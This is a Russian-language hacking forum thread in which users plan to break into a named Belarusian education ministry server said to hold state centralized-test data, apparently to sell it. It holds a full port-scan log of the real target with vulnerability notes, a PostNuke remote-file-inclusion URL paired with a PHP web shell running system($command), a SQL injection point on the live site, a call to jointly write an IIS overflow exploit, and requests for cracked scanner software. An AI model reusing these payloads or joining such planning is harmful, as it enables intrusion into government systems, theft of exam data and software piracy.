• XSS.stack #1 – первый литературный журнал от юзеров форума

ЦЕНТРАЛИЗОВАННОЕ ТЕСТИРОВАНИЕ

/dev/AVR

RAID-массив
Пользователь
Регистрация
11.11.2005
Сообщения
86
Реакции
0
ИЗВИНЯЮСЬ ЧТО НЕ В ТОПИКЕ Просьбы Взломать т.к не рядовая инфа, а фактически, гос тайна.
Взлом Централизованного Тестирования. ДАННЫЕ(ЦТ) сам лично видел в 2004г.
Люди, раскрываю Гос тайну, т.к задолбался один долбить IIS 6 на
Buffer Overflow вручную с SoftIce. Скорее всего я сам наврятли успею
найти переполнение(были мысли по произвольному EAX), но опять же
не факт переполнения. Сами ЦТ(Российские и Белорусские) находятся
на так называемом союзном сервере 195.50.0.161 в PGP шифрованном виде.
Кому не в падлу долбать 2003 сервак на рут, без ASP скриптов а с чистым
дизасмом, милости прошу, мне не жалко.
PS: Может кто нибудь и вскроет и будет продавать за хороший WM.
ЗЫ: NETBIOS у него вроде как то хитро расшарен с minedu.unibel.by(Сам Имел когда то)
И с этого Хостнэйма Filtered не будет.
На системе из фаеров вроде как стоит Kerio Winroute Firewall + IDS(не знаю точно какая)
и вечно трезвый админ, так что поточно ничего не стягивайте, проверено, просекет.
 
Может я тупой , но я тебя реально не понял! Причем тут микросовт исс шттп сервер? прчем тут дизасемблер и регистр ЕАХ? Если тебе надо зайти на серв, http://minedu.unibel.by/ находиться на нем. то что тебе мешает зайти с этого сайта??
Добавлено в [time]1131872137[/time]
вообщем кидаю лог сканирования, достаточно старым сканером (новый пока у меня демо, поэтому что есть :( )

Код:
Сбор данных по компьютеру "195.50.0.161"...
Дата и время сканирования: 13.11.2005 - 10:59:11

Данные на доступных DNS серверах по этому компьютеру отсутствуют
Компьютер не отвечает или с ним нет связи

TCP порты
 - открытые    : 41
 - закрытые    : 2897
 - недоступные : 2



- порт 80/tcp
  сервер HTTP  : Microsoft-IIS/6.0  >>>
    состояние  : 403 (Forbidden)
    текущие  дата и время  :  (Sun, 13 Nov 2005 08:00:13 GMT)
    формат содержимого     :  (text/html)
    соединение             :  (close)

    определение следующей информации находится пока в тестовом режиме
    реальное имя http-сервера совпадает с указанным в его ответе
    сервер HTTP : Microsoft IIS HTTP Server 6.0  >>>

- порт 25/tcp
  сервер SMTP    - отправка почты   (работает)
    ALICE3.unibel.by Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830 ready at  Sun, 13 Nov 2005 10:11:40 +0200   >>>

- порт 110/tcp
  сервер POP3    - получение почты  (работает)
    Microsoft Exchange Server 2003 POP3 server version 6.5.7226.0 (ALICE3.unibel.by) ready.  >>>

- порт 143/tcp
  сервис IMAP    - Internet Message Access Protocol
    Microsoft Exchange Server 2003 IMAP4rev1 server version 6.5.7226.0 (ALICE3.unibel.by) ready.  >>>

- порт 389/tcp
  сервис LDAP    - Lightweight Directory Access Protocol
    состояние  :  <работает>  >>>

    подозрение на существование уязвимости
    возможна DOS-атака во многих OS  ::::

     описание уязвимости:
      Multiple Vulnerabilities in Several Implementations 
      of the Lightweight Directory Access Protocol (LDAP).
      
      Solution: Upgrade.
      
      Patch: http://www.openLDAP.org/software/download/
      
      Url:
      http://www.cert.org/advisories/CA-2001-18.html
      


- порт 3389/tcp
  сервис RDP     - Terminal Service Client
    состояние  :  <работает>   >>>

- порт 53/tcp
  сервер DNS (TCP)
    рекурсия не поддерживается сервером
    ошибка при трансфере зоны "microsoft.com"  (N 3)
    версию BIND определить не удалось


- порт 7/tcp
  сервис отвечает тем же запросом, который ему посылается  >>>

- порт 9/tcp

- порт 13/tcp
  ответ сервиса:
    10:16:47 13.11.2005 #10   >>>

- порт 17/tcp
  ответ сервиса:
    "Man can climb to the highest summits, but he cannot dwell there long." #13  #10  George Bernard Shaw (1856-1950) #13  #10   >>>

- порт 19/tcp
  ответ сервиса:
     !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg #13  #10 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh #13  #10 "#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi #13  #10 #$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWX  >>>

- порт 21/tcp
  сервер FTP     - передача файлов  (работает)
    Microsoft FTP Service  >>>
    ------------------------------------------
    доступ анонимному пользователю запрещен

- порт 81/tcp

- порт 82/tcp
  сервер HTTP  : <неопознан>  >>>
    состояние  : 400 (Bad Request)

    определение следующей информации находится пока в тестовом режиме
    определить реальное имя http-сервера не удалось
    отпечатка этой конфигурации сервера нет в базе данных сканера
    пожалуйста сообщите об этом разработчикам программы (support@xspider.ru)
    с указанием деталей о http-сервере и об его конфигурации

- порт 83/tcp

- порт 88/tcp

- порт 443/tcp

- порт 464/tcp

- порт 636/tcp

    подозрение на существование уязвимости
    возможно изменение пароля в LDAP в Windows 2000  ::::

     описание уязвимости:
      Function Exposed via LDAP over SSL in W2K 
      Could Enable Passwords to be Changed.
      This vulnerability involves an LDAP function that is only 
      available if the LDAP server has been configured to support 
      LDAP over SSL sessions, and whose purpose is to allow users 
      to change the data attributes of directory principals. 
      By design, the function should check the authorizations of 
      the user before completing the request; however, it contains 
      an error that manifests itself only when the directory 
      principal is a domain user and the data attribute is 
      the domain password -- when this is the case, the function 
      fails to check the permissions of the requester, with the 
      result that it could be possible for a user to change any 
      other user’s domain login password. An attacker could change 
      another user’s password for either of two purposes: to cause 
      a denial of service by preventing the other user from logging on, 
      or in order to log into the user’s account and gain any 
      privileges the user had. Clearly, the most serious case would 
      be one in which the attacker changed a domain administrator’s 
      password and logged into the administrator’s account. 
      By design, the function affected can be called by any user 
      who can connect to the LDAP server, including users who connect 
      via anonymous sessions. As a result, any user who could establish 
      a connection with an affected server could exploit the vulnerability. 
      
      Solution: Patch.
      
      Patch:
      http://www.microsoft.com/windows2000/downloads/security/q299687/default.asp
      
      Url:
      http://www.microsoft.com/technet/security/bulletin/MS01-036.asp


- порт 691/tcp
  ответ сервиса:
    {0000004c} NODEINFO (5) {38}Version: 6.5.7226.026.0 Microsoft Routing Server ready #13  #10     >>>

- порт 993/tcp

- порт 995/tcp

- порт 1025/tcp
  сервис стандарта Win RPC  >>>
    "services.exe" - Services and Controller app  >>>

- порт 1030/tcp
  ответ сервиса:
    ncacn_http/1.0  >>>

- порт 1080/tcp

- порт 1082/tcp
  сервис стандарта Win RPC  >>>
    "ntfrs.exe" - File Replication Service  >>>

- порт 1100/tcp
  сервис стандарта Win RPC  >>>
    "MAD.exe" - Microsoft Exchange System Attendant  >>>

- порт 1122/tcp
  сервис стандарта Win RPC  >>>
    "mqsvc.exe" - Message Queuing Service  >>>

- порт 1191/tcp
  сервис стандарта Win RPC  >>>
    "tcpsvcs.exe" - Simple TCP/IP Services  >>>

- порт 1801/tcp

- порт 2103/tcp
  сервис стандарта Win RPC  >>>
    "mqsvc.exe" - Message Queuing Service  >>>

- порт 2105/tcp
  сервис стандарта Win RPC  >>>
    "mqsvc.exe" - Message Queuing Service  >>>

- порт 2107/tcp
  сервис стандарта Win RPC  >>>
    "mqsvc.exe" - Message Queuing Service  >>>

- порт 3128/tcp

- порт 6001/tcp
  ответ сервиса:
    ncacn_http/1.0  >>>

- порт 6002/tcp
  ответ сервиса:
    ncacn_http/1.0  >>>

- порт 7900/tcp

- порт 8080/tcp

- порт 8088/tcp

- порт 53/udp
  сервер DNS (UDP)
    сервер поддерживает рекурсию  >>>>
    версию BIND определить не удалось

- порт 7/udp
  сервис Echo (UDP)
    состояние  :  <работает>   >>>

- порт 13/udp
  сервис DayTime (UDP)
    время и дата : [10:47:51 13.11.2005]  >>>

- порт 17/udp
  сервис Quote of the day (UDP)
    состояние  :  <работает>   >>>


Найдено:
 - замечаний                : 36   >>>
 - возможных предупреждений : 2   ::::
 - предупреждений           : 1   >>>>
 
2 Polas
Как сканер называется можешь дистрибутивчик выкинуть?
Я сканил LanSpy(недавно систему переустанавливал проги пока не все поставил :) )
Вот чё я о нём узнал
195.50.0.161 (unibel.by)

Доменное имя: unibel.by

TCP порты (6) 21 ftp => File Transfer [Control]

25 smtp => Simple Mail Transfer Protocol 220 ALICE3.unibel.by Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830 ready at Sun, 13 Nov 2005 11:02:23 +0200



110 pop3 => Post Office Protocol - Version 3

143 imap => Internet Message Access Protocol

389 ldap => Light Directory Access Protocol

443 https => http protocol over TLS/SSL



UDP порты (7) 123 NTP => Network Time Protocol

135 epmap => DCE endpoint resolution

137 netbios-ns => NetBios Name Service

138 netbios-dgm => NetBios Datagram Service

161 SNMP => Simple Network Management Protocol

445 Microsoft CIFS => Common Internet File System

1434 ms-sql-m => Microsoft-SQL-Monitor
 
2 Polas
Как сканер называется можешь дистрибутивчик выкинуть?

Очеь известны XSPIDER!! сам качал через емул, поисчи в поисковике, 7.0 - пока тока демо, и краков не найдешь, надо уже нормальный скачивать по емлулу, могу дать тока 6.5 , скажи где выкладывать! (хотя на крайняк вылажу где нить у себя)!
Добавлено в [time]1131873152[/time]
2 Polas
Как сканер называется можешь дистрибутивчик выкинуть?
Я сканил LanSpy(недавно систему переустанавливал проги пока не все поставил :) )
Вот чё я о нём узнал
195.50.0.161 (unibel.by)

Доменное имя: unibel.by

TCP порты (6) 21 ftp => File Transfer [Control]

25 smtp => Simple Mail Transfer Protocol 220 ALICE3.unibel.by Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830 ready at Sun, 13 Nov 2005 11:02:23 +0200



110 pop3 => Post Office Protocol - Version 3

143 imap => Internet Message Access Protocol

389 ldap => Light Directory Access Protocol

443 https => http protocol over TLS/SSL



UDP порты (7) 123 NTP => Network Time Protocol

135 epmap => DCE endpoint resolution

137 netbios-ns => NetBios Name Service

138 netbios-dgm => NetBios Datagram Service

161 SNMP => Simple Network Management Protocol

445 Microsoft CIFS => Common Internet File System

1434 ms-sql-m => Microsoft-SQL-Monitor

маловато будет!!! :P
 
Очеь известны XSPIDER
Блин сколько раз видел его на разных сайтах ни разу не скачал(лень было да и у меня другие малость), а кряк найду я где-то и кряк видел

маловато будет!!!
дааа ну всё бегу за xSpider'ом
 
Очеь известны XSPIDER
Блин сколько раз видел его на разных сайтах ни разу не скачал(лень было да и у меня другие малость), а кряк найду я где-то и кряк видел

7 - тока демо версия, для нее крак ты просто не найдешь, потому что это ДЕМО
 
7 - тока демо версия, для нее крак ты просто не найдешь, потому что это ДЕМО
Я понимаю, но для xSpider 6.5.0.12 кряк будет надеюсь.
 
7 - тока демо версия, для нее крак ты просто не найдешь, потому что это ДЕМО
Я понимаю, но для xSpider 6.5.0.12 кряк будет надеюсь.
ищи новогоднюю версию он безплатная (Christmas edition)!
 
нужен сканер xSpider, на веб-хаке ссылка битая :unsure:


Добавлено в [time]1131873927[/time]
мне и платная сойдёт кряк найду
 
нужен сканер xSpider, на веб-хаке ссылка битая :unsure:


Добавлено в [time]1131873927[/time]
мне и платная сойдёт кряк найду

Я тебе сказал что могу дать, ты скажи куда класть? вааще юзай эмул - там все есть!!! про крак говорю еще раз - это демо, не может там быть крака. там все просто урезано само по себе. когда ты покупаешь тебе высылают нову программу - рабочую, и полную!
 
Выкладывай куда угодно хоть здесь... а хотя ты не пользовался
Shadow Security Scanner 6.00 или LANguard Network Security Scanner 5.0 просто увидел случайно и не знаю качать или не качать(о как сказал прям как шекспир "быть или не быть...")?
 
Выкладывай куда угодно хоть здесь... а хотя ты не пользовался
Shadow Security Scanner 6.00 или LANguard Network Security Scanner 5.0 просто увидел случайно и не знаю качать или не качать(о как сказал прям как шекспир "быть или не быть...")?

Можешь скачать, попробовать, но это все не то, хспидер считаеться одинм из лучших сканеров!
 
ок скачаю, сравним результаты может они в двоём чё путнее достанут ну LanSpy я нах снесу хотя в локалке он оч даже не плох я из компа одного вытянул от операцияонки вплоть до журнала событий и инфы из реестра
 
Раньше прикольная трабла была (На Алкахосте тестил) И с NMом+ Сервак MINEDU.UNIBEL.BY скрещивал.
Примерно так: http://localhost/post/html/user.php?caselist[badfile.txt][path]=http://localhost&command=mkdir%20c:\AAAAAA

Где bad_file.txt:
<?php
system($command);
?>
Имел я это дело на ура, пока PostNuke не обновили(СВОЛОЧИ !!!)

Polas, отвечу на вопрос причем тут IIS 6 и Дизасм. Просто я баги искал в IISе.
На мой взгляд там кое что есть, но пока, еще лишь идеи по переполнению при обращении к ядру.
Просто 6 IIS работает под нашим любимым svchost.exe
Запускает IIS HTTP сервис inetmrg. Вот тут я при запуске и сидел с дизасмом, смотрел как все
работает в Мастдай софтовском HTTP сервере (32Bit).

Да, и еще, версию POSTNUKE на MINEDU узнаем так http://www.minedu.unibel.by/docs/manual.txt

PSPS: Патчат админы все только в путь, так что тут нужно вручную кодить EXPLOIT т.к все PUBLIC
уже давно патчено.

Если у кого будут какие идеи по Оверфлоу в каком либо сервисе,прошу, выкладывайте.
Вместе сплойт накалякаем.
 
Раньше прикольная трабла была (На Алкахосте тестил) И с NMом+ Сервак MINEDU.UNIBEL.BY скрещивал.
Примерно так: http://localhost/post/html/user.php?caselist[badfile.txt][path]=http://localhost&command=mkdir%20c:\AAAAAA

Где bad_file.txt:
<?php
system($command);
?>
Имел я это дело на ура, пока PostNuke не обновили(СВОЛОЧИ !!!)

Polas, отвечу на вопрос причем тут IIS 6 и Дизасм. Просто я баги искал в IISе.
На мой взгляд там кое что есть, но пока, еще лишь идеи по переполнению при обращении к ядру.
Просто 6 IIS работает под нашим любимым svchost.exe
Запускает IIS HTTP сервис inetmrg. Вот тут я при запуске и сидел с дизасмом, смотрел как все
работает в Мастдай софтовском HTTP сервере (32Bit).

Да, и еще, версию POSTNUKE на MINEDU узнаем так http://www.minedu.unibel.by/docs/manual.txt

PSPS: Патчат админы все только в путь, так что тут нужно вручную кодить EXPLOIT т.к все PUBLIC
уже давно патчено.

Если у кого будут какие идеи по Оверфлоу в каком либо сервисе,прошу, выкладывайте.
Вместе сплойт накалякаем.

вот мой что у меня:

www.minedu.unibel.by/index.php?module=subjects&func=listcat&catid=[скьюл!!!!]
 
По моему SQL мало что сможет дать ! :cry2: Нужно поковырять фильтры на PHP Injection и не посредственно сами сервисы 2003го сервака.
Кто нибудь знает, там IIS с 32 разрядной или 64 разрядной адресацией ?
В общем ось 32 or 64 bit ??? :help:
 
По моему SQL мало что сможет дать ! :cry2: Нужно поковырять фильтры на PHP Injection и не посредственно сами сервисы 2003го сервака.
Кто нибудь знает, там IIS с 32 разрядной или 64 разрядной адресацией ?
В общем ось 32 or 64 bit ??? :help:

Скьюл запрос может дать пароль админа!
 
я так понял группа хакеров ломает сервер с данными по ЕГЭ ?
Но если вы про тот где находяться результаты и данные следующих тестов, то он не имеет физического доступа в Internet. Да и какого либо другого.
Мне кстати сканер в особенности XSpider не разу не помог. Только ламера с Sp1 без фаера просканил для теста. Все. несколько раз выручал nmap.
все можно зделать руками.
 
Сервак ЕГЭ ломать бесполезно. Не только потому что результатов нет практически на диске. Весь ЕГЭ это набор задач перемешаный по - разному в разных вариантах.

Фасуются задачи и ответы на них при печати и ответы существуют только в компе проверялке. Который все эти тесты сканит. Также дубликат верности есть на бумаге в пакете. Даже если будет доступ к самим задачам (а до их печати еще дожить надо) то это ничего не даст. Ибо фиг спишешь ЕГЭ выбирая из 100 листов нужное задание.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх